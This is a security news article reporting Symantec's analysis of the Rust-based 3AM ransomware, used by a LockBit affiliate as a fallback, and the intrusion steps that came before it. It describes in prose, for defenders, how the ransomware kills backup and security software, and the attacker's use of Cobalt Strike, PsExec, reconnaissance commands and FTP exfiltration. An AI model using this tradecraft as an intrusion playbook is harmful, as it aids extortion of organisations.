Attackers use fallback ransomware if LockBit gets blocked

Your security solutions might stave off a LockBit infection, but you might still end up with encrypted files: according to Symantec’s threat researchers, some affiliates are using the 3AM ransomware as a fallback option in case LockBit gets flagged and blocked.

3AM ransomware

LockBit is a known ransomware family that has been unleashing havoc for quite some time now.

But what about 3AM? Dubbed thus because of the .threeamtime extension added to the encrypted files, 3AM is a new ransomware family written in Rust.

According to the researchers’ analysis, it tries to terminate security and backup-related software that’s running on the infected computer and – after encrypting the targeted files and deleting the original ones – it tries to delete Volume Shadow copies.

“To date, the ransomware has only been used in a limited fashion,” the researchers noted – the company’s threat hunters have seen it used in a single attack by a ransomware affiliate.

It also doesn’t seem to be very effective or stealthy enough to go unnoticed. “The attackers only managed to deploy it to three machines on the organization’s network and it was blocked on two of those three computers.”

Nevertheless, the attackers had some success: before attempting to encrypt them, they exfiltrated the files, which means that they might yet try to extort the victim organization.

“New ransomware families appear frequently and most disappear just as quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future,” Symantec threat hunters commented.

Before ransomware deployment

The company does not say how the first system was compromised.

“The first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy settings enforced on the computer for a specified user. The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec,” Symantec threat hunters shared.

The attackers then started doing reconnaissance (with whoami, netstat, quser, and net share commands), tried to enumerate other servers they can jump on (with quser and net view commands), added a new user for persistence, and exfiltrated the victims’ files to their own FTP server via the Wput tool.

Symantec has provided indicators of compromise: IP addresses and file hashes for the two malware samples and Cobalt Strike beacons.